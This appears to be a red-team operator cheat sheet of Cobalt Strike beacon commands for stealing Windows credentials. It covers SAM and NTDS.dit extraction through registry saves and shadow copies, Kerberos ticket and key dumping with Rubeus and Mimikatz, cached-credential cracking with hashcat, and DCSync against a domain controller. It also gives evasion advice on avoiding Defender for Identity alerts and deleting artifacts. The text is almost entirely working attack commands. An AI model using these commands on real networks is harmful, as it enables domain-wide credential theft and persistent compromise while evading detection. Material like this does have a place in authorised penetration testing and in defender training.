SAM Database Dumping#
Usage: Extract local account hashes from SAM database.
# Method 1: Mimikatz SAM dump (requires SYSTEM)
beacon> mimikatz !lsadump::sam
# Method 2: Registry hive extraction
beacon> shell reg save HKLM\SAM C:\Windows\Temp\sam
beacon> shell reg save HKLM\SYSTEM C:\Windows\Temp\system
beacon> download C:\Windows\Temp\sam
beacon> download C:\Windows\Temp\system
# Parse offline: secretsdump.py -sam sam -system system LOCAL
# Method 3: Volume Shadow Copy (VSS) extraction
beacon> shell vssadmin create shadow /for=C:
beacon> shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\Temp\sam
beacon> shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\Temp\system
beacon> shell vssadmin delete shadows /shadow={ShadowID} /quiet
# Cleanup
beacon> shell del C:\Windows\Temp\sam
beacon> shell del C:\Windows\Temp\system
Kerberos Ticket Extraction#
Usage: Extract and manage Kerberos tickets from memory.
# List all cached Kerberos tickets
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe triage
# Dump all tickets for current user
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump
# Dump specific ticket by LUID
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /luid:0x7049f /service:krbtgt /nowrap
# Dump all TGTs from all sessions (requires elevation)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe dump /service:krbtgt /nowrap
# Monitor for new tickets (useful for coercion attacks)
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap /filteruser:DC01$
# Extract tickets with Mimikatz
beacon> mimikatz !sekurlsa::tickets /export
# OPSEC: Ticket extraction is logged in Event ID 4769 (service ticket request)
Kerberos Encryption Keys Extraction#
Usage: Extract Kerberos AES/RC4 keys for overpass-the-hash attacks.
# Extract all Kerberos encryption keys (requires elevation)
beacon> mimikatz !sekurlsa::ekeys
# Output format:
# - RC4 (NTLM hash)
# - AES128 key
# - AES256 key (preferred for OPSEC)
# Use with Rubeus for overpass-the-hash
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:jdoe /aes256:<aes256_key> /domain:corp.local /nowrap
# OPSEC: AES256 keys generate less suspicious logs than NTLM
Domain Cached Credentials (DCC/DCC2)#
Usage: Extract cached domain credentials from local system.
# Dump cached credentials (requires SYSTEM)
beacon> mimikatz !lsadump::cache
# Output: MS-Cache v2 hashes (cannot be used for pass-the-hash)
# Format: $DCC2$10240#username#hash
# Crack with hashcat
$ hashcat -m 2100 dcc2_hashes.txt wordlist.txt
# Note: DCC2 hashes are slow to crack (10,240 PBKDF2 iterations)
# Cannot be used directly for authentication - must be cracked first
Domain Controller Credential Extraction#
DCSync Attack#
Usage: Extract credentials remotely from Domain Controller (requires replication rights).
# Required permissions:
# - Replicating Directory Changes
# - Replicating Directory Changes All
# - Replicating Directory Changes In Filtered Set
# Check if current user has DCSync rights
beacon> powerpick Get-DomainObjectAcl -SearchBase "DC=corp,DC=local" -ResolveGUIDs | ? {($_.ObjectAceType -match 'replication') -and ($_.SecurityIdentifier -match $(ConvertTo-SID $env:USERNAME))}
# DCSync specific user
beacon> dcsync corp.local CORP\krbtgt
beacon> dcsync corp.local CORP\Administrator
# DCSync with Mimikatz (alternative syntax)
beacon> make_token CORP\jdoe Passw0rd123!
beacon> mimikatz @lsadump::dcsync /domain:corp.local /user:krbtgt
# DCSync all domain users (OpSec risk - very noisy)
beacon> mimikatz @lsadump::dcsync /domain:corp.local /all /csv
# Alternative: Use SharpKatz for DCSync
beacon> execute-assembly C:\Tools\SharpKatz\SharpKatz.exe --Command dcsync --User krbtgt --Domain corp.local --DomainController dc01.corp.local
# OPSEC Considerations:
# - DCSync generates Event ID 4662 (directory service access)
# - Monitored by: Azure ATP, Defender for Identity
# - Space out DCSync requests to avoid detection
# - Target specific high-value accounts instead of /all
# Cleanup
beacon> rev2self
Local krbtgt Extraction (on DC)#
Usage: Extract krbtgt hash locally when on Domain Controller.
# Must be executed with SYSTEM privileges on DC
beacon> getuid
# Method 1: Extract krbtgt from LSASS
beacon> mimikatz !lsadump::lsa /inject /name:krbtgt
# Method 2: Extract from ntds.dit (if accessible)
beacon> mimikatz !lsadump::lsa /inject
# Verify extraction
# Output includes:
# - NTLM hash (for golden ticket)
# - AES128 key
# - AES256 key (preferred)
NTDS.dit Extraction#
Usage: Extract entire Active Directory database for offline analysis.
# Method 1: Volume Shadow Copy (requires DA or EA privileges)
beacon> shell vssadmin create shadow /for=C:
beacon> shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\NTDS\ntds.dit C:\Windows\Temp\ntds.dit
beacon> shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\Windows\System32\config\SYSTEM C:\Windows\Temp\system.hive
beacon> download C:\Windows\Temp\ntds.dit
beacon> download C:\Windows\Temp\system.hive
beacon> shell vssadmin delete shadows /shadow={ShadowID} /quiet
# Method 2: NTDSUtil (native tool)
beacon> shell ntdsutil "activate instance ntds" "ifm" "create full C:\Windows\Temp\ntds_backup" quit quit
beacon> download C:\Windows\Temp\ntds_backup\Active Directory\ntds.dit
beacon> download C:\Windows\Temp\ntds_backup\registry\SYSTEM
# Method 3: Native vssadmin alternative (Windows Server)
beacon> shell wmic shadowcopy call create Volume=C:\
beacon> shell copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy{N}\Windows\NTDS\ntds.dit C:\Temp\ntds.dit
# Parse offline with secretsdump
$ secretsdump.py -ntds ntds.dit -system system.hive LOCAL -outputfile domain_hashes
# Alternative: impacket-secretsdump
$ impacket-secretsdump -ntds ntds.dit -system system.hive -security security.hive LOCAL
# Cleanup
beacon> shell del C:\Windows\Temp\ntds.dit
beacon> shell del C:\Windows\Temp\system.hive
beacon> shell rmdir /s /q C:\Windows\Temp\ntds_backup
# OPSEC: NTDS extraction is highly suspicious and logged extensively
# Event IDs: 4662 (directory service access), custom ETW events